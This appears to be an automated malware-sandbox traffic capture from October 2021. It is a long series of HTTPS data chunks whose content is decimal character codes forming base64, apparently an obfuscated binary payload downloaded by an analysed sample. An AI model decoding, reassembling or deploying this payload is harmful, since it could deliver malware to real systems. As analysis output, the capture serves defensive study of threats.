                    Data Ascii: 102 0 81 0 120 0 56 0 52 0 87 0 98 0 51 0 119 0 119 0 65 0 81 0 100 0 81 0 87 0 76 0 102 0 107 0 84 0 114 0 65 0 52 0 116 0 43 0 83 0 80 0 43 0 50 0 111 0 65 0 73 0 65 0 65 0 79 0 104 0 43 0 120 0 118 0 47 0 47 0 86 0 50 0 103 0 65 0 87 0 65 0 65 0 65 0
                    2021-10-26 16:59:38 UTC2948INData Raw: 30 20 34 37 20 30 20 31 30 30 20 30 20 31 31 39 20 30 20 31 30 35 20 30 20 37 36 20 30 20 31 32 32 20 30 20 34 37 20 30 20 35 37 20 30 20 35 30 20 30 20 38 39 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 32 20 30 20 31 32 31 20 30 20 37 36 20 30 20 38 34 20 30 20 31 30 32 20 30 20 31 30 34 20 30 20 38 34 20 30 20 34 37 20 30 20 35 35 20 30 20 39 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 35 34 20 30 20 37 31 20 30 20 38 30 20 30 20 36 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 36 20 30 20 31 30 34 20 30 20 38 31 20 30 20 38 36 20 30 20 34 33 20 30 20 31 30 36
                    Data Ascii: 0 47 0 100 0 119 0 105 0 76 0 122 0 47 0 57 0 50 0 89 0 71 0 111 0 65 0 47 0 120 0 68 0 47 0 100 0 102 0 121 0 76 0 84 0 102 0 104 0 84 0 47 0 55 0 97 0 103 0 65 0 103 0 65 0 65 0 54 0 71 0 80 0 68 0 47 0 47 0 43 0 68 0 120 0 66 0 104 0 81 0 86 0 43 0 106
                    2021-10-26 16:59:38 UTC2952INData Raw: 30 20 37 30 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 31 34 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 36 39 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 36 35 20 30 20 38 30 20 30 20 35 35 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 36 36 20 30 20 31 31 33 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 33 20 30 20 37 36 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 35 20 30 20 38 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 37 20 30 20 38 39 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 38 20 30 20 31 31 35 20
                    Data Ascii: 0 70 0 68 0 111 0 114 0 107 0 65 0 65 0 65 0 73 0 80 0 69 0 69 0 73 0 50 0 70 0 65 0 80 0 55 0 47 0 47 0 49 0 66 0 113 0 65 0 71 0 103 0 76 0 66 0 65 0 65 0 65 0 47 0 55 0 89 0 119 0 65 0 119 0 65 0 65 0 47 0 120 0 87 0 89 0 119 0 85 0 65 0 65 0 88 0 115
                    2021-10-26 16:59:38 UTC2964INData Raw: 30 20 38 34 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 32 20 30 20 31 30 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 37 20 30 20 31 31 33 20 30 20 34 37 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 36 20 30 20 34 39 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 39 38 20 30 20 35 30 20 30 20 31 31 31 20 30 20 34 37 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 34 20 30 20 36 39 20 30 20 39 39 20 30 20 35 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 33 20 30 20 38 39 20 30 20 31 31 31 20 30 20 35 30 20 30 20 37 30 20 30 20 31 30 31 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 31 30 30 20 30 20 38 31 20 30 20 39 30 20
                    Data Ascii: 0 84 0 111 0 65 0 65 0 71 0 112 0 105 0 106 0 89 0 87 0 113 0 47 0 118 0 47 0 47 0 86 0 49 0 66 0 109 0 105 0 98 0 50 0 111 0 47 0 118 0 47 0 47 0 54 0 69 0 99 0 54 0 65 0 65 0 66 0 113 0 89 0 111 0 50 0 70 0 101 0 118 0 47 0 47 0 47 0 49 0 100 0 81 0 90
                    2021-10-26 16:59:38 UTC2980INData Raw: 20 38 31 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 34 20 30 20 38 32 20 30 20 36 37 20 30 20 38 31 20 30 20 39 39 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 36 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 31 30 33 20 30 20 34 37 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 31 20 30 20 31 32 32 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 37 36 20 30 20 38 35 20 30 20 38 34 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 31 20 30 20 31 30 37 20 30 20 37 30 20 30 20 37 33 20 30 20 31 30 38 20 30 20 36 39 20 30 20 37 34 20 30 20 36 37 20 30 20 36 38 20 30 20 34 37
                    Data Ascii: 81 0 67 0 65 0 65 0 67 0 74 0 82 0 67 0 81 0 99 0 47 0 120 0 86 0 65 0 119 0 69 0 65 0 65 0 97 0 103 0 47 0 47 0 70 0 101 0 122 0 66 0 81 0 65 0 67 0 76 0 76 0 85 0 84 0 65 0 81 0 65 0 66 0 81 0 47 0 51 0 81 0 107 0 70 0 73 0 108 0 69 0 74 0 67 0 68 0 47
                    2021-10-26 16:59:38 UTC2996INData Raw: 20 30 20 35 36 20 30 20 31 31 31 20 30 20 35 30 20 30 20 38 37 20 30 20 31 31 36 20 30 20 31 30 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 30 38 20 30 20 35 37 20 30 20 34 37 20 30 20 37 31 20 30 20 39 37 20 30 20 37 36 20 30 20 37 32 20 30 20 36 36 20 30 20 37 30 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 38 32 20 30 20 31 31 32 20 30 20 36 37 20 30 20 38 31 20 30 20 31 31 38 20 30 20 35 37 20 30 20 37 38 20 30 20 34 37 20 30 20 37 32 20 30 20 38 38 20 30 20 31 32 31 20 30 20 31 30 36 20 30 20 39 30 20 30 20 39 37 20 30 20 35 30 20 30 20 38 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 31 35 20 30 20 39 39 20 30 20 36 39 20 30 20 38 37 20 30 20 39 37 20 30 20 37 34 20
                    Data Ascii: 0 56 0 111 0 50 0 87 0 116 0 107 0 103 0 65 0 65 0 73 0 108 0 57 0 47 0 71 0 97 0 76 0 72 0 66 0 70 0 109 0 105 0 82 0 112 0 67 0 81 0 118 0 57 0 78 0 47 0 72 0 88 0 121 0 106 0 90 0 97 0 50 0 83 0 103 0 65 0 65 0 90 0 111 0 115 0 99 0 69 0 87 0 97 0 74
                    2021-10-26 16:59:38 UTC3012INData Raw: 20 31 30 35 20 30 20 38 35 20 30 20 38 31 20 30 20 31 30 37 20 30 20 36 39 20 30 20 36 35 20 30 20 34 33 20 30 20 36 39 20 30 20 31 32 31 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 34 39 20 30 20 37 37 20 30 20 37 34 20 30 20 36 36 20 30 20 38 32 20 30 20 38 32 20 30 20 39 37 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 36 20 30 20 36 37 20 30 20 38 33 20 30 20 37 33 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 36 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 35 20 30 20 36 38 20 30 20 35 32 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 36 35 20 30
                    Data Ascii: 105 0 85 0 81 0 107 0 69 0 65 0 43 0 69 0 121 0 65 0 69 0 65 0 65 0 73 0 49 0 77 0 74 0 66 0 82 0 82 0 97 0 65 0 67 0 65 0 65 0 65 0 67 0 78 0 106 0 67 0 83 0 73 0 67 0 65 0 65 0 65 0 85 0 86 0 68 0 47 0 70 0 85 0 68 0 52 0 81 0 65 0 67 0 70 0 119 0 65 0
                    2021-10-26 16:59:38 UTC3028INData Raw: 20 36 35 20 30 20 31 30 36 20 30 20 38 30 20 30 20 36 35 20 30 20 38 38 20 30 20 34 39 20 30 20 35 33 20 30 20 39 38 20 30 20 31 32 31 20 30 20 39 39 20 30 20 37 33 20 30 20 37 33 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 37 30 20 30 20 36 37 20 30 20 37 33 20 30 20 38 30 20 30 20 31 31 35 20 30 20 37 33 20 30 20 37 33 20 30 20 37 37 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 37 30 20 30 20 31 30 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 37 38 20 30 20 38 37 20 30 20 38 36 20 30 20 35 32 20 30 20 31 31 35 20 30 20 35 37 20 30 20 35 31 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20
                    Data Ascii: 65 0 106 0 80 0 65 0 88 0 49 0 53 0 98 0 121 0 99 0 73 0 73 0 65 0 70 0 87 0 76 0 55 0 73 0 116 0 70 0 67 0 73 0 80 0 115 0 73 0 73 0 77 0 52 0 65 0 65 0 43 0 70 0 106 0 65 0 65 0 65 0 65 0 70 0 78 0 87 0 86 0 52 0 115 0 57 0 51 0 77 0 66 0 65 0 65 0 71
                    2021-10-26 16:59:39 UTC3044INData Raw: 34 37 20 30 20 34 37 20 30 20 35 36 20 30 20 36 36 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 37 30 20 30 20 37 31 20 30 20 37 33 20 30 20 31 31 35 20 30 20 34 39 20 30 20 39 38 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 39 20 30 20 39 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 33 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 30 20 30 20 38 34 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 38 36 20 30 20 35 31 20 30 20 31 31 31 20 30 20 34 37 20 30 20 35
                    Data Ascii: 47 0 47 0 56 0 66 0 65 0 73 0 116 0 70 0 71 0 73 0 115 0 49 0 98 0 77 0 66 0 65 0 65 0 71 0 111 0 69 0 97 0 65 0 65 0 81 0 65 0 65 0 67 0 47 0 105 0 73 0 73 0 65 0 65 0 70 0 100 0 84 0 47 0 51 0 85 0 77 0 105 0 85 0 88 0 115 0 105 0 86 0 51 0 111 0 47 0 5
                    2021-10-26 16:59:39 UTC3060INData Raw: 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 34 20 30 20 36 39 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 38 39 20 30 20 31 30 33 20 30 20 35 31 20 30 20 35 32 20 30 20 36 39 20 30 20 34 37 20 30 20 35 36 20 30 20 31 30 30 20 30 20 37 30 20 30 20 34 37 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 34 39 20 30 20 36 37 20 30 20 36 38 20 30 20 31 30 38 20 30 20 31 30 31 20 30 20 36 37 20 30 20 37 32 20 30 20 35 36 20 30 20 36 38 20 30 20 31 30 35 20 30 20 38 36 20 30 20 35 31 20 30 20 35 36 20 30 20 37 39 20 30 20 38 36 20 30 20 35 31 20 30 20 35 36 20 30 20 31 30 35 20 30 20 35 31 20 30 20 34 38 20 30 20 37
                    Data Ascii: 18 0 47 0 47 0 43 0 104 0 69 0 65 0 119 0 65 0 65 0 103 0 56 0 81 0 89 0 103 0 51 0 52 0 69 0 47 0 56 0 100 0 70 0 47 0 65 0 69 0 65 0 65 0 65 0 66 0 49 0 67 0 68 0 108 0 101 0 67 0 72 0 56 0 68 0 105 0 86 0 51 0 56 0 79 0 86 0 51 0 56 0 105 0 51 0 48 0 7
                    2021-10-26 16:59:39 UTC3076INData Raw: 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 37 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 35 34 20 30 20 35 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 33 20 30 20 37 39 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 34 20 30 20 39 38 20 30 20 31 31 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 39 39 20 30 20 35 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 30 20 30 20 37 39 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 34 20 30 20 31 31 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 37 39 20 30 20 35 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30
                    Data Ascii: 5 0 65 0 65 0 65 0 65 0 65 0 73 0 76 0 117 0 65 0 65 0 67 0 54 0 55 0 103 0 65 0 65 0 113 0 79 0 52 0 65 0 65 0 74 0 98 0 117 0 65 0 65 0 68 0 99 0 55 0 81 0 65 0 65 0 100 0 79 0 52 0 65 0 65 0 71 0 84 0 117 0 65 0 65 0 66 0 79 0 55 0 103 0 65 0 65 0 80 0
                    2021-10-26 16:59:39 UTC3092INData Raw: 20 30 20 31 32 31 20 30 20 36 35 20 30 20 37 32 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 30 20 30 20 36 35 20 30 20 36 36 20 30 20 37 34 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 31 37 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 31 30 31 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 38 20 30
                    Data Ascii: 0 121 0 65 0 72 0 85 0 65 0 99 0 119 0 66 0 48 0 65 0 71 0 85 0 65 0 90 0 65 0 66 0 74 0 65 0 71 0 52 0 65 0 99 0 119 0 66 0 48 0 65 0 71 0 69 0 65 0 98 0 65 0 66 0 115 0 65 0 71 0 85 0 65 0 99 0 103 0 65 0 117 0 65 0 71 0 85 0 65 0 101 0 65 0 66 0 108 0
                    2021-10-26 16:59:39 UTC3108INData Raw: 30 20 31 30 33 20 30 20 36 36 20 30 20 31 30 36 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 35 37 20 30 20 36 35 20 30 20 36 37 20 30 20 37 33 20 30 20 36 35 20 30 20 38 33 20 30 20 38 31 20 30 20 36 36 20 30 20 38 34 20 30 20 36 35 20 30 20 36 39 20 30 20 35 36 20 30 20 36 35 20 30 20 37 36 20 30 20 38 31 20 30 20 36 35 20 30 20 35 32 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 38 20 30 20 38 31 20 30 20 36 35 20 30 20 35 33 20 30 20 36 35 20 30 20 36 37 20 30 20 34 38 20 30 20 36 35 20 30 20 37 37 20 30 20 38 31 20 30 20 36 35 20
                    Data Ascii: 0 103 0 66 0 106 0 65 0 71 0 56 0 65 0 90 0 65 0 66 0 112 0 65 0 71 0 52 0 65 0 90 0 119 0 65 0 57 0 65 0 67 0 73 0 65 0 83 0 81 0 66 0 84 0 65 0 69 0 56 0 65 0 76 0 81 0 65 0 52 0 65 0 68 0 103 0 65 0 78 0 81 0 65 0 53 0 65 0 67 0 48 0 65 0 77 0 81 0 65
                    2021-10-26 16:59:39 UTC3112INData Raw: 20 36 37 20 30 20 38 37 20 30 20 39 39 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 35 31 20 30 20 35 31 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 38 20 30 20 31 32 30 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 32 20 30 20 31 30 33 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 39 39 20 30 20 35 30 20 30 20 35 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 34 20 30 20 39 30 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 31 30 39 20 30 20 39 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 37 20 30 20 35 31 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 37 35 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30
                    Data Ascii: 67 0 87 0 99 0 107 0 65 0 65 0 51 0 51 0 66 0 65 0 65 0 78 0 120 0 119 0 81 0 65 0 66 0 82 0 103 0 85 0 65 0 65 0 99 0 50 0 53 0 65 0 65 0 74 0 90 0 119 0 81 0 65 0 67 0 109 0 99 0 69 0 65 0 65 0 107 0 51 0 74 0 65 0 65 0 73 0 75 0 66 0 81 0 65 0 68 0 10
                    2021-10-26 16:59:39 UTC3128INData Raw: 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 31 20 30 20 37 37 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 36 38 20 30 20 31 30 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 37 36 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 35 32 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 34 20 30 20 37 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35
                    Data Ascii: 0 119 0 65 0 65 0 101 0 77 0 73 0 65 0 65 0 71 0 68 0 102 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 77 0 76 0 107 0 65 0 65 0 65 0 52 0 119 0 65 0 65 0 65 0 104 0 79 0 69 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65
                    2021-10-26 16:59:39 UTC3144INData Raw: 20 30 20 31 31 30 20 30 20 37 34 20 30 20 31 30 38 20 30 20 39 30 20 30 20 38 31 20 30 20 36 38 20 30 20 31 30 39 20 30 20 36 35 20 30 20 36 39 20 30 20 39 30 20 30 20 31 31 32 20 30 20 39 38 20 30 20 31 30 39 20 30 20 38 32 20 30 20 38 33 20 30 20 39 30 20 30 20 38 38 20 30 20 37 38 20 30 20 31 31 38 20 30 20 31 30 30 20 30 20 38 38 20 30 20 37 34 20 30 20 31 30 36 20 30 20 39 30 20 30 20 38 36 20 30 20 39 39 20 30 20 36 35 20 30 20 31 32 30 20 30 20 31 31 39 20 30 20 37 38 20 30 20 31 31 35 20 30 20 39 39 20 30 20 35 31 20 30 20 38 32 20 30 20 31 32 31 20 30 20 38 39 20 30 20 35 31 20 30 20 36 36 20 30 20 35 33 20 30 20 38 36 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 31 39 20 30 20 37 34 20 30 20 37 37 20 30 20 39 38 20
                    Data Ascii: 0 110 0 74 0 108 0 90 0 81 0 68 0 109 0 65 0 69 0 90 0 112 0 98 0 109 0 82 0 83 0 90 0 88 0 78 0 118 0 100 0 88 0 74 0 106 0 90 0 86 0 99 0 65 0 120 0 119 0 78 0 115 0 99 0 51 0 82 0 121 0 89 0 51 0 66 0 53 0 86 0 119 0 65 0 65 0 86 0 119 0 74 0 77 0 98
                    2021-10-26 16:59:39 UTC3160INData Raw: 30 20 37 32 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 34 39 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 32 30 20 30 20 34 39 20 30 20 35 36 20 30 20 38 34 20 30 20 37 37 20 30 20 31 31 39 20 30 20 31 31 35 20 30 20 31 32 32 20 30 20 37 36 20 30 20 31 32 32 20 30 20 31 30 32 20 30 20 31
                    Data Ascii: 0 72 0 103 0 65 0 65 0 65 0 67 0 49 0 66 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 66 0 65 0 65 0 65 0 65 0 70 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 68 0 120 0 49 0 56 0 84 0 77 0 119 0 115 0 122 0 76 0 122 0 102 0 1
                    2021-10-26 16:59:39 UTC3176INData Raw: 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 38 31 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 36 36 20 30 20 31 31 31 20 30 20 36 37 20 30 20 36 35 20 30 20 37 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 38 20 30 20 31 31 39 20 30 20 39 38 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 35 30 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 35 33 20 30 20 36 35 20 30 20
                    Data Ascii: 3 0 103 0 65 0 65 0 65 0 79 0 81 0 69 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 43 0 66 0 111 0 67 0 65 0 79 0 81 0 65 0 65 0 65 0 68 0 107 0 66 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 78 0 119 0 98 0 65 0 103 0 65 0 50 0 65 0 119 0 65 0 65 0 53 0 65 0
                    2021-10-26 16:59:39 UTC3192INData Raw: 20 31 30 31 20 30 20 37 31 20 30 20 31 30 31 20 30 20 37 36 20 30 20 34 33 20 30 20 37 38 20 30 20 35 35 20 30 20 37 34 20 30 20 35 35 20 30 20 31 31 35 20 30 20 31 32 31 20 30 20 34 39 20 30 20 35 34 20 30 20 39 39 20 30 20 36 37 20 30 20 31 31 32 20 30 20 35 37 20 30 20 31 31 35 20 30 20 35 34 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 37 20 30 20 38 37 20 30 20 31 31 36 20 30 20 34 37 20 30 20 35 37 20 30 20 37 39 20 30 20 31 31 30 20 30 20 34 37 20 30 20 35 36 20 30 20 35 34 20 30 20 31 30 33 20 30 20 34 37 20 30 20 35 36 20 30 20 31 31 37 20 30 20 39 39 20 30 20 31 30 32 20 30 20 38 35 20 30 20 31 31 36 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31
                    Data Ascii: 101 0 71 0 101 0 76 0 43 0 78 0 55 0 74 0 55 0 115 0 121 0 49 0 54 0 99 0 67 0 112 0 57 0 115 0 54 0 118 0 47 0 57 0 87 0 116 0 47 0 57 0 79 0 110 0 47 0 56 0 54 0 103 0 47 0 56 0 117 0 99 0 102 0 85 0 116 0 74 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 1
                    2021-10-26 16:59:39 UTC3208INData Raw: 20 30 20 35 30 20 30 20 39 38 20 30 20 39 37 20 30 20 31 30 39 20 30 20 31 32 31 20 30 20 31 31 32 20 30 20 39 30 20 30 20 35 31 20 30 20 31 32 30 20 30 20 38 39 20 30 20 31 30 38 20 30 20 31 31 32 20 30 20 31 32 32 20 30 20 31 31 32 20 30 20 31 30 30 20 30 20 35 32 20 30 20 35 30 20 30 20 39 38 20 30 20 37 31 20 30 20 31 30 30 20 30 20 35 35 20 30 20 35 37 20 30 20 37 31 20 30 20 35 36 20 30 20 35 35 20 30 20 35 34 20 30 20 31 31 33 20 30 20 31 30 30 20 30 20 35 35 20 30 20 31 31 31 20 30 20 31 31 37 20 30 20 36 39 20 30 20 31 30 38 20 30 20 31 30 39 20 30 20 31 30 30 20 30 20 31 30 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 32 20 30 20 31 30 39 20 30 20 31 32
                    Data Ascii: 0 50 0 98 0 97 0 109 0 121 0 112 0 90 0 51 0 120 0 89 0 108 0 112 0 122 0 112 0 100 0 52 0 50 0 98 0 71 0 100 0 55 0 57 0 71 0 56 0 55 0 54 0 113 0 100 0 55 0 111 0 117 0 69 0 108 0 109 0 100 0 105 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 112 0 109 0 12
                    2021-10-26 16:59:39 UTC3224INData Raw: 30 20 34 37 20 30 20 37 36 20 30 20 31 32 32 20 30 20 37 37 20 30 20 39 38 20 30 20 34 37 20 30 20 31 32 31 20 30 20 35 36 20 30 20 31 32 32 20 30 20 37 31 20 30 20 34 37 20 30 20 35 36 20 30 20 31 31 38 20 30 20 37 37 20 30 20 31 32 30 20 30 20 31 31 38 20 30 20 34 37 20 30 20 37 36 20 30 20 31 32 32 20 30 20 37 37 20 30 20 39 38 20 30 20 34 37 20 30 20 31 32 31 20 30 20 35 36 20 30 20 31 32 32 20 30 20 37 31 20 30 20 34 37 20 30 20 35 36 20 30 20 31 31 38 20 30 20 37 37 20 30 20 31 32 30 20 30 20 31 31 38 20 30 20 34 37 20 30 20 37 36 20 30 20 31 32 32 20 30 20 37 37 20 30 20 39 38 20 30 20 34 37 20 30 20 31 32 31 20 30 20 35 36 20 30 20 31 32 32 20 30 20 37 31 20 30 20 34 37 20 30 20 35 36 20 30 20 31 31 38 20 30 20 37 37 20 30 20 31 32 30 20 30 20 31
